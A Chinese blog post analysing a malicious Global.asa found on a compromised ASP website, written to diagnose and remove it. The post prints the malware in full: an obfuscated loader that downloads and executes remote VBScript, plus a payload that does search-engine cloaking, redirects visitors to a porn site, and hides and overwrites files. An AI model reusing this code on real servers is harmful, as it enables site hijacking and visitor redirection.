最近,有个别用户反映网站直接从浏览器打开正常,但从百度或者google等搜索引擎搜索结果点击打开后会跳转到色情网站。
分析:
1,该问题都发生在 asp网站
2,网站访问量较大
3,网站首页等程序文件并未有篡改迹象
4,发现根目录下有Global.asa 文件(罪魁祸首)
打开Global.asa 查看代码如下:
<script language="vbscript" runat="server">
'by*diao
'by*aming
' Application_OnStart: intentionally empty. All of this file's active logic is in
' Session_OnStart below; the empty handlers only make the file look like an
' ordinary Global.asa.
sub Application_OnStart
end sub
' Application_OnEnd: empty stub, no cleanup is performed.
sub Application_OnEnd
end sub
' Session_OnStart: runs once for every new visitor session. It downloads a
' remote VBScript payload over HTTP and executes it server-side, so the code
' that actually runs on this site is whatever the remote host serves at the
' time -- it can be changed without touching this file again.
sub Session_OnStart
' URL assembled one character at a time; it spells
' http://www.tayequ.com/txt/globals.txt (presumably built this way so a plain
' string search of the file does not find the URL).
url="h"&"t"&"t"&"p"&":"&"/"&"/"&"w"&"w"&"w"&"."&"t"&"a"&"y"&"e"&"q"&"u"&"."&"c"&"o"&"m"&"/"&"t"&"x"&"t"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"s"&"."&"t"&"x"&"t"
' Synchronous server-side HTTP GET (third Open argument is False).
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
' The URL itself is sent as the User-Agent. This may act as a key the payload
' host checks before answering -- cannot be confirmed from this side.
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
' responseBody is the raw byte array of the response.
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
' Byte array -> gb2312 text via an ADODB.Stream round trip: write as binary
' (Type=1), rewind, re-read as text (Type=2) with the gb2312 charset.
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
' Gate on the author's marker string "by*aming" (present in the payload shown
' later in this article). execute runs the downloaded text as VBScript inside
' this Session_OnStart scope, so redirects/file writes in the payload happen on
' the first request of each session.
if instr(GetHtml,"by*aming")>0 then
execute GetHtml
end if
end sub
'sub Session_OnEnd
'end sub
</script>
因为 Global.asa 是 ASP 应用的启动文件:应用第一次被访问时执行 Application_OnStart,每个新会话(用户首次访问)开始时执行 Session_OnStart。上面的代码把活动逻辑全放在 Session_OnStart 里:每当有新会话开始,就从 http://www.tayequ.com/txt/globals.txt 下载内容,若其中含有标记 "by*aming",便用 execute 在服务器端直接执行。也就是说,网站实际运行的代码由远程主机控制,随时可以被更换,下面看到的 globals.txt 只是当时取到的版本。让我们来看看 http://www.tayequ.com/txt/globals.txt 的内容是什么吧:
'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
'by*aming
'Server.ScriptTimeout=600
' createasa(Content): overwrites the site root /global.asa with Content.
' Defined here but NOT called by the visible top-level code (the call further
' down is commented out). All errors are swallowed by On Error Resume Next.
Public Function createasa(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
' "//./" prefixes the mapped path with the Win32 device-namespace form.
set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))
' Clear all attributes first so the read-only/hidden/system flags set at the end
' of this function do not block the overwrite.
f.Attributes=0
' ProgID split into pieces ("adod" & "b.S" & "tream"), presumably so the string
' "adodb.Stream" does not appear literally in the file.
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
' Freshly opened stream is empty, so this is position 0.
Obj.Position = Obj.Size
' Property-assignment form of WriteText; if this form does not actually write,
' the error is hidden by On Error Resume Next.
Obj.writetext = Content
' Second argument 2 = adSaveCreateOverWrite: replaces the existing file.
Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2
Obj.Close
Set Obj = Nothing
' 1+2+4 = ReadOnly + Hidden + System (FileSystemObject attribute values), so the
' file is not shown by a default directory listing.
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
' createasax(Content): same routine as createasa, but the target is
' /global.asax (the ASP.NET application file). Also never called by the visible
' code. Its presence means a cleanup should check the web root for global.asax
' as well as Global.asa.
Public Function createasax(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asax"))
' Clear attributes so the overwrite is not blocked.
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
' 2 = adSaveCreateOverWrite.
Obj.SaveToFile "//./" & Server.MapPath("/global.asax"),2
Obj.Close
Set Obj = Nothing
' ReadOnly + Hidden + System.
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
' GetHtml(url): synchronous server-side HTTP GET of url, returned as a gb2312-
' decoded string. Same fetch-and-decode sequence as the one in Global.asa's
' Session_OnStart. No error handling: a failed request raises into the caller.
Public Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
' The requested URL is sent as the User-Agent (possibly a server-side gate on the
' remote host; not verifiable here).
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
' Raw bytes into the function's return variable, converted to text below.
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
' Binary -> text conversion through ADODB.Stream with charset gb2312.
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
End Function
' check(user_agent): True when user_agent contains any of the listed crawler
' names (Baidu, Sogou, Soso, Google, FAST, MSN, Yahoo Slurp). This is the
' "is the visitor a search engine?" test the cloaking logic relies on.
' InStr uses the default binary compare, so matching is case-sensitive.
Function check(user_agent)
allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")
check_agent=false
For agenti=lbound(allow_agent) to ubound(allow_agent)
If instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
Next
check=check_agent
End function
' CheckRobot(): True for a Baiduspider/Googlebot User-Agent, or for any session
' that has once requested a URL with ?admin=1 -- a manual switch that lets the
' operator see what the crawlers are served. Not referenced by the top-level
' code in this version of the payload. Krobotlist is used without being
' declared in the Dim (VBScript allows this without Option Explicit).
Function CheckRobot()
CheckRobot = False
Dim Botlist,i,Repls
Repls = request.ServerVariables("http_user_agent")
Krobotlist = "Baiduspider|Googlebot"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(Repls,Botlist(i)) > 0 Then
CheckRobot = True
Exit For
End If
Next
' Backdoor switch: ?admin=1 marks the session as a "robot" for its lifetime.
If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1
If Session("ThisCheckRobot") = 1 Then CheckRobot = True
End Function
' CheckRefresh(): True when the first 40 characters of the HTTP Referer contain
' one of the search-result-page patterns (Baidu, google.cn, Sogou, Soso). This
' is the "visitor arrived from a search result" test that triggers the
' redirect, which is why direct visits are unaffected.
Function CheckRefresh()
CheckRefresh = False
Dim Botlist,i,Repls
Krobotlist = "baidu|google.cn/search?|sogou.com/web?query=|soso.com/q?w="
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
' left(...,"40"): the length is passed as a string and coerced to 40.
If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then
CheckRefresh = True
Exit For
End If
Next
End Function
' sleep(): despite the name it does not pause. Flushes the response if the
' client is still connected, otherwise ends the response.
Sub sleep()
If response.IsClientConnected=true then
Response.Flush
else
response.end
end if
End Sub
' ---- Payload entry point (executed inside Global.asa's Session_OnStart) ----
' Branch 1: Referer is a search-engine result page and the visitor is not a
' crawler -> redirect to the attacker's site. Note that user_agent is only
' assigned further down, so here check() receives an uninitialised (Empty)
' value and, as far as this listing shows, returns False: every search-referred
' visitor is redirected. This matches the reported symptom exactly.
If CheckRefresh=true Then
If check(user_agent)=false Then
cnnbd=lcase(request.servervariables("HTTP_HOST"))
' The victim's host name is appended to the redirect URL.
response.redirect("http://www.hencao.com/hh.html?html"&cnnbd&"")
response.end
end If
end if
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
' Branch 2: crawler User-Agent -> fetch attacker-supplied content from
' 98.126.137.155:28 and write it into the response ahead of the real page
' (search-engine cloaking). strHost is never assigned in the visible code, so
' domain= is sent empty. response.end is commented out, so the legitimate page
' is still rendered after the injected content.
if check(user_agent)=true then
body=GetHtml("http://98.126.137.155:28/?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")
response.write body
'response.end
else
' Branch 3: ordinary visitor. The payload is downloaded again into asa, but the
' createasa(asa) self-update call below is commented out, so the result is
' unused in this version.
asa=GetHtml("h"&"t"&"t"&"p"&":"&"/"&"/"&"w"&"w"&"w"&"."&"t"&"a"&"y"&"e"&"q"&"u"&"."&"c"&"o"&"m"&"/"&"t"&"x"&"t"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"s"&"."&"t"&"x"&"t")
'if instr(asa,"by*diao")>0 then
' createasa(asa)
'end if
' geturl / namepath are computed from the current request but not used further
' in the visible code.
ScriptAddress=Request.ServerVariables("SCRIPT_NAME")
namepath=Server.MapPath(ScriptAddress)
If Len(Request.QueryString) > 0 Then
ScriptAddress = ScriptAddress & "?" & Request.QueryString
end if
geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress
geturl =LCase(geturl)
Call sleep()
'end if
end if
'</body></html>
这块代码的作用是按访问者身份分流:Referer 来自搜索引擎结果页(CheckRefresh 为真)而 User-Agent 又不是爬虫时,用 response.redirect 跳转到 http://www.hencao.com/hh.html?html<本站域名>,这就是从搜索结果打开后跳转到的色情网站地址;User-Agent 是搜索引擎爬虫时,则从 98.126.137.155:28 取回内容写进响应(搜索引擎劫持/黑帽 SEO);而直接打开网站的普通访问者两个条件都不满足,不受影响。所以症状只在从搜索结果点击进入时出现。
5,解决方法:
解决方法看起来很简单——删除 Global.asa 文件。但有几点要注意:payload 里的 createasa 会把该文件属性设为 1+2+4(只读+隐藏+系统),默认的目录列表可能看不到,要显示隐藏和系统文件再查找,删除前也要先去掉只读属性;payload 里还有针对 global.asax 的同名函数,根目录下有没有被写入 global.asax 也要一并检查;由于实际执行的代码是从远程下载的,这里看到的 globals.txt 内容随时可能变化,不能只按本文的特征去排查。最主要的还是要检查程序本身的安全问题:多出这个文件不是偶然,99% 是程序有漏洞,被利用后上传了该文件——同一个漏洞很可能还上传了其他后门文件,需要对整个站点目录一起排查。
感谢:jude_liu